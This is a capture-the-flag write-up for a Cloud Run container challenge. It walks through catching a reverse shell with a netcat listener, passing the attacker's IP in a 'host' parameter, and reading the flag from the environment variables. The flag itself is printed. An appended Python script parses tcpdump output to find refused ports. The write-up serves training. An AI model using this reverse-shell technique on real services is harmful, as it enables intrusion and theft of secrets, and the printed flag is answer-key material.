Running in the Clouds - Solution

Introduction

William Swordsworth, the modern-day container hacker/poet, wants you to compromise a container that he has set up containing a secret. He promises lots of head breaking, out-of-the-box thinking, packet inspection and swearing.

Starting point

  1. The container has a public endpoint - https://ctfcloudrun-sz2ttebtva-uc.a.run.app.

Your task

  1. Read the flag in the env of the container.

Walkthrough

  1. From the poem, identify the variable name to be passed to the web application. Trying some combinations reveals that the parameter is host.

  2. Open all ports on the Security Group for the attacker machine.

  3. Since we don't know what port the reverse shell will connect back to, we need to run tcpdump and see which port receives a TCP RST packet. On the attacker machine, in a new terminal, run the following tcpdump command:

     tcpdump -ni eth0 -s 1500 port not 22 and port not 53 and not port 443 and not arp

  4. While tcpdump is running, access the Cloud Run web app and notice the port number that Cloud Run is trying to connect to.

  5. Run a netcat listener on port 6945 - nc -nlvp 6945.

  6. Make a web request to the public URL of the Cloud Run app, passing the IP of the attacker machine via a GET parameter called host.

     Example: https://ctfcloudrun-sz2ttebtva-uc.a.run.app/?host=<attacker-ip>

  7. From the reverse shell, dump the environment variables, which contain the flag.

  8. The flag is POET_INSIDE_HACKER_OUTSIDE.
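
The tcpdump step above is done by reading the capture by eye. As an added example (not part of the original walkthrough), this Python parses `tcpdump -n` text output and counts inbound SYNs that the local host answered with RST, that is, connection attempts to a port with no listener. The IP addresses and capture lines are constructed, and the function name refused_ports is hypothetical.

```python
import re
from collections import Counter

# Matches the one-line text output of `tcpdump -n` for IPv4 TCP packets.
PACKET_RE = re.compile(
    r"IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)

def refused_ports(lines, local_ip):
    """Count inbound SYNs to local_ip that the host answered with RST."""
    pending = set()      # (remote_ip, remote_port, local_port) with a SYN seen
    refused = Counter()  # local_port -> number of refused attempts
    for line in lines:
        m = PACKET_RE.search(line)
        if not m:
            continue  # UDP, ICMP or otherwise unparsable line
        flags = m["flags"]
        if m["dst"] == local_ip and flags == "S":
            pending.add((m["src"], m["sport"], m["dport"]))
        elif m["src"] == local_ip and "R" in flags:
            key = (m["dst"], m["dport"], m["sport"])
            if key in pending:
                pending.discard(key)
                refused[int(m["sport"])] += 1
    return refused

# Constructed sample capture: 10.0.0.5 is the local host running tcpdump,
# 198.51.100.7 is the remote service. Port 6945 is the one from the walkthrough.
SAMPLE = """\
12:01:02.100000 IP 198.51.100.7.41234 > 10.0.0.5.6945: Flags [S], seq 1000, win 65535, options [mss 1460], length 0
12:01:02.100050 IP 10.0.0.5.6945 > 198.51.100.7.41234: Flags [R.], seq 0, ack 1001, win 0, length 0
12:01:03.200000 IP 198.51.100.7.41236 > 10.0.0.5.6945: Flags [S], seq 2000, win 65535, options [mss 1460], length 0
12:01:03.200040 IP 10.0.0.5.6945 > 198.51.100.7.41236: Flags [R.], seq 0, ack 2001, win 0, length 0
12:01:04.000000 IP 10.0.0.5.50000 > 192.0.2.9.80: Flags [S], seq 3000, win 64240, length 0
12:01:05.000000 IP 10.0.0.5.123 > 192.0.2.1.123: NTPv4, Client, length 48
""".splitlines()

if __name__ == "__main__":
    for port, count in refused_ports(SAMPLE, "10.0.0.5").most_common():
        print(f"port {port}: {count} refused connection attempt(s)")
```
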
